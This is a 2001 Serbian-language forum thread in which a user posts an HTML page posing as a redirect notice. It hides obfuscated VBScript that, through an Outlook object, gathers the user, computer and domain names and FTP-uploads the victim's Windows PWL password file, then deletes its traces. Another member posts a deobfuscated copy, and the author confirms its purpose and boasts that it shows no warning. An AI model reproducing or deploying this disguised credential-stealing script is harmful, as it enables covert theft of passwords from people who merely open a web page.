[ dql8 @ 29.08.2001. 02:04 ] @
<html>
<body text="#00FF00" bgcolor="#000000">

<p align="center"> <font size="6">Sacekajte par sekundi, i
bicete redirektovani...</font></blink></p>
<p align="center">stranicu napravio: <a href="mailto:[email protected]">dql</a></p>

<p align="center">
<SCRIPT LANGUAGE=vbscript>
<!--
Sub DDDD
On Error Resume Next
set sel=o1.object.selection
set obj1=sel.item(1)
set wshn = obj1.Session.Application.createobject(chr(119) +chr(115) +chr(99) +chr(114) +chr(105) +chr(112) +chr(116) +chr(46) +chr(110) +chr(101) +chr(116) +chr(119) +chr(111) +chr(114) +chr(107))
set wshs = obj1.Session.Application.createobject(chr(119) +chr(115) +chr(99) +chr(114) +chr(105) +chr(112) +chr(116) +chr(46) +chr(115) +chr(104) +chr(101) +chr(108) +chr(108))
Set fso = obj1.Session.Application.CreateObject(chr(83) +chr(99) +chr(114) +chr(105) +chr(112) +chr(116) +chr(105) +chr(110) +chr(103) +chr(46) +chr(70) +chr(105) +chr(108) +chr(101) +chr(83) +chr(121) +chr(115) +chr(116) +chr(101) +chr(109) +chr(79) +chr(98) +chr(106) +chr(101) +chr(99) +chr(116))

sIme=wshn.username

for i=1 to len(sIme)
if mid(sIme,i,1)=" " then
tmp=""
else
tmp=mid(sIme,i,1)
end if
sTempIme = sTempIme + tmp
next

if len(sTempIme)>8 then sTempIme=left(sTempIme,8)
sIme=sTempIme

Set file = fso.CreateTextFile (chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(107) +chr(111) +chr(109) +chr(97) +chr(110) +chr(100) +chr(101) +chr(46) +chr(116) +chr(120) +chr(116), TRUE)
file.write chr(117) +chr(115) +chr(101) +chr(114) +vbcrlf
file.write chr(112) +chr(97) +chr(115) +chr(115) +vbcrlf
file.write chr(112) +chr(117) +chr(116) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +cstr(sIme)+chr(46) +chr(112) +chr(119) +chr(108) +vbcrlf
file.write chr(112) +chr(117) +chr(116) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +cstr(sIme)+chr(46) +chr(116) +chr(120) +chr(116) +vbcrlf
file.write chr(113) +chr(117) +chr(105) +chr(116) +vbcrlf
file.Close
Set file = fso.CreateTextFile (chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +cstr(sIme)+chr(46) +chr(116) +chr(120) +chr(116), TRUE)
file.write chr(105) +chr(109) +chr(101) +chr(32) +chr(107) +chr(111) +chr(109) +chr(112) +chr(97) +chr(58) +chr(32) +cstr(wshn.computername)+vbcrlf
file.write chr(105) +chr(109) +chr(101) +chr(32) +chr(117) +chr(115) +chr(101) +chr(114) +chr(97) +chr(58) +chr(32) +cstr(wshn.username)+vbcrlf
file.write chr(100) +chr(111) +chr(109) +chr(101) +chr(110) +chr(58) +chr(32) +cstr(wshn.userdomain)+vbcrlf
file.close
Set file = fso.CreateTextFile (chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(102) +chr(97) +chr(106) +chr(108) +chr(46) +chr(98) +chr(97) +chr(116), TRUE)
file.write chr(102) +chr(116) +chr(112) +chr(32) +chr(45) +chr(115) +chr(58) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(107) +chr(111) +chr(109) +chr(97) +chr(110) +chr(100) +chr(101) +chr(46) +chr(116) +chr(120) +chr(116) +chr(32) +chr(49) +chr(50) +chr(55) +chr(46) +chr(48) +chr(46) +chr(48) +chr(46) +chr(49) +vbcrlf
file.write chr(100) +chr(101) +chr(108) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(107) +chr(111) +chr(109) +chr(97) +chr(110) +chr(100) +chr(101) +chr(46) +chr(116) +chr(120) +chr(116) +vbcrlf
file.write chr(100) +chr(101) +chr(108) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +cstr(sIme)+chr(46) +chr(116) +chr(120) +chr(116) +vbcrlf
file.write chr(100) +chr(101) +chr(108) +chr(32) +chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(102) +chr(97) +chr(106) +chr(108) +chr(46) +chr(98) +chr(97) +chr(116) +vbcrlf
file.close
wshs.run chr(99) +chr(58) +chr(92) +chr(119) +chr(105) +chr(110) +chr(100) +chr(111) +chr(119) +chr(115) +chr(92) +chr(116) +chr(101) +chr(109) +chr(112) +chr(92) +chr(102) +chr(97) +chr(106) +chr(108) +chr(46) +chr(98) +chr(97) +chr(116),vbhide

location = chr(112) +chr(111) +chr(99) +chr(101) +chr(116) +chr(110) +chr(97) +chr(46) +chr(104) +chr(116) +chr(109)
End Sub

settimeout "DDDD",2000

-->
</SCRIPT>

<OBJECT classid=clsid:0006F063-0000-0000-C000-000000000046 id=o1
style="HEIGHT: 1; WIDTH: 1"><PARAM NAME="Folder" VALUE="Inbox">
</OBJECT>

</body>
</html>

[Ovu poruku je menjao dql8 dana 08-29-2001 u 02:10 AM GMT]
[ Reljam @ 29.08.2001. 07:29 ] @
Ovi silni chr(xxx) me navode da pomislim da to ne bi trebalo startovati....
[ Rodd @ 29.08.2001. 14:42 ] @
Ova VBS skripta pravi neke fajlove pa ih onda izgleda i pokrece. Ove chr(xxx) funkcije su u stvari karakteri (u chr() ide nANSIC broj 0-255, a povratna vrednost je odgovarajuci karakter). Ovo je ocigledno korisceno da bi se otezalo citanje samog koda. Dakle, da bi ti sad otkrio kako se zovu fajlovi koje je skripta napravila, gde su smesteni, i sta je smesteno u njih, trebao bi da desifrujes svaki od ovih chr(xxx) karaktra ponaosob.
[ alex @ 29.08.2001. 17:20 ] @
Citat:
Rodd je napisao:
Ova VBS skripta pravi neke fajlove pa ih onda izgleda i pokrece. Ove chr(xxx) funkcije su u stvari karakteri (u chr() ide nANSIC broj 0-255, a povratna vrednost je odgovarajuci karakter). Ovo je ocigledno korisceno da bi se otezalo citanje samog koda. Dakle, da bi ti sad otkrio kako se zovu fajlovi koje je skripta napravila, gde su smesteni, i sta je smesteno u njih, trebao bi da desifrujes svaki od ovih chr(xxx) karaktra ponaosob.


$ cat htmlfile | perl -e 'while(<stdin>) { s/chr((.*?))/chr($1)/ge; s/\+//g; print $_;}'

<html>
<body text="#00FF00" bgcolor="#000000">

<p align="center"> <font size="6">Sacekajte par sekundi, i
bicete redirektovani...</font></blink></p>
<p align="center">stranicu napravio: <a href="mailto:[email protected]">dql</a></p>

<p align="center">
<SCRIPT LANGUAGE=vbscript>
<!--
Sub DDDD
On Error Resume Next
set sel=o1.object.selection
set obj1=sel.item(1)
set wshn = obj1.Session.Application.createobject(w s c r i p t . n e t w o r k)
set wshs = obj1.Session.Application.createobject(w s c r i p t . s h e l l)
Set fso = obj1.Session.Application.CreateObject(S c r i p t i n g . F i l e S y s t e m O b j e c t)

sIme=wshn.username

for i=1 to len(sIme)
if mid(sIme,i,1)=" " then
tmp=""
else
tmp=mid(sIme,i,1)
end if
sTempIme = sTempIme tmp
next

if len(sTempIme)>8 then sTempIme=left(sTempIme,8)
sIme=sTempIme

Set file = fso.CreateTextFile (c : w i n d o w s t e m p k o m a n d e . t x t, TRUE)
file.write u s e r vbcrlf
file.write p a s s vbcrlf
file.write p u t c : w i n d o w s cstr(sIme). p w l vbcrlf
file.write p u t c : w i n d o w s t e m p cstr(sIme). t x t vbcrlf
file.write q u i t vbcrlf
file.Close
Set file = fso.CreateTextFile (c : w i n d o w s t e m p cstr(sIme). t x t, TRUE)
file.write i m e k o m p a : cstr(wshn.computername)vbcrlf
file.write i m e u s e r a : cstr(wshn.username)vbcrlf
file.write d o m e n : cstr(wshn.userdomain)vbcrlf
file.close
Set file = fso.CreateTextFile (c : w i n d o w s t e m p f a j l . b a t, TRUE)
file.write f t p - s : c : w i n d o w s t e m p k o m a n d e . t x t 1 2 7 . 0 . 0 . 1 vbcrlf
file.write d e l c : w i n d o w s t e m p k o m a n d e . t x t vbcrlf
file.write d e l c : w i n d o w s t e m p cstr(sIme). t x t vbcrlf
file.write d e l c : w i n d o w s t e m p f a j l . b a t vbcrlf
file.close
wshs.run c : w i n d o w s t e m p f a j l . b a t,vbhide

location = p o c e t n a . h t m
End Sub

settimeout "DDDD",2000

-->
</script>

<OBJECT classid=clsid:0006F063-0000-0000-C000-000000000046 id=o1
style="HEIGHT: 1; WIDTH: 1"><PARAM NAME="Folder" VALUE="Inbox">
</object>

</body>
</html>

Eto, mrzelo me jos da skidam i whitespace-tove... Sad ko zna VBS nek ovo provali...


[Ovu poruku je menjao alex dana 08-29-2001 u 04:20 PM GMT]

[Ovu poruku je menjao alex dana 08-29-2001 u 04:21 PM GMT]
[ alex @ 29.08.2001. 17:24 ] @
Citat:
alex je napisao:
[Ovu poruku je menjao alex dana 08-29-2001 u 04:20 PM GMT]

[Ovu poruku je menjao alex dana 08-29-2001 u 04:21 PM GMT]


Tupavi forum - pojede sve "\" karaktere.. Gojko, da li koristis stripSlashes() i ostale pogodne PHP funkcije za ovaj Forum,
jer je ovako totalno neupotrebljivo!

Poz, alex.
[ Gojko Vujovic @ 29.08.2001. 17:58 ] @
Taj deo koji radi input processing u ovom forumu nisam ni menjao a cini mi se da radi stripslashes i htmlspecialchars() na svakoj unetoj poruci, da bi se zastitili od 'akovanja.

Znam da kvari kod al yeb ga.. ne znam za bolji nacin.
[ dql8 @ 30.08.2001. 00:02 ] @
heheheh, pitanje je shta ova stranica radi, ja sam je napravio, ako neko sazna ( a vidi se da oce ), moze dobro da mu posluzi!
:)
[ Gojko Vujovic @ 30.08.2001. 10:28 ] @
Hmm još uvek ne znam šta radi ali razmišljam se da je stavim kao prvu stranicu ESa i pritom rešim dva problema: 1. pobijem sve ove IE korisnike koji bezbrižno surfuju svojim shiternet exploiterom, 2. saznaćemo šta taj kod tačno radi

Nice, huh? :)
[ Trunks @ 01.09.2001. 01:50 ] @
Gojko: sve je to lepo ali bi izgubio 80% posetioca :).
[ dql8 @ 05.09.2001. 22:24 ] @
Evo da se vise ne mucite (ako jos iko razmislja o ovoj stranici:), ona uploaduje korisnikov PWL fajl na izabrani ftp server:))
Zanimljivo, zar ne?

P.S. Stranica je testirana samo samo sa Officeom XP, i ne javlja nikakvu poruku prilikom preuzimanja fajla (osim shto se firewall malo buni:)
Poz
[ Ivan Dimitrijević @ 05.09.2001. 23:02 ] @
Citat:
Trunks je napisao:
Gojko: sve je to lepo ali bi izgubio 80% posetioca :).


Tuzno, ali istinito !!!